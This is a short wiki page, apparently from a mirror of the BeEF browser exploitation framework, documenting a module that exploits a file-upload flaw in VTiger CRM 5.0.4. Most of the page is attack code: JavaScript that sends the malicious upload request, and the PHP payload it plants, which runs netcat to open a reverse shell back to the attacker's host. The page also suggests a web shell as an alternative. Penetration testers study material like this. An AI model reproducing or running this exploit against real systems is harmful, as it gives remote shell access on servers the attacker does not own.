Module: VTiger CRM Upload Exploit - h4sh5/beef GitHub Wiki
-
Objective: Exploits VTiger CRM 5.0.4 and uploads a reverse shell
-
Authors: wade, bm, pipes, xntrik, yorikv
-
Browsers: All
Uploads a reverse shell PHP file via XMLHttpRequest.
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
//..
http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
//...The PHP uploaded and executed:
<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>If /bin/nc is not installed on the target machine, this will not work. For a start you can try to upload a web shell instead of a reverse shell. The PHP code can be changed in
<beef_path>/modules/exploits/vtiger_crm_upload_exploit/module.rb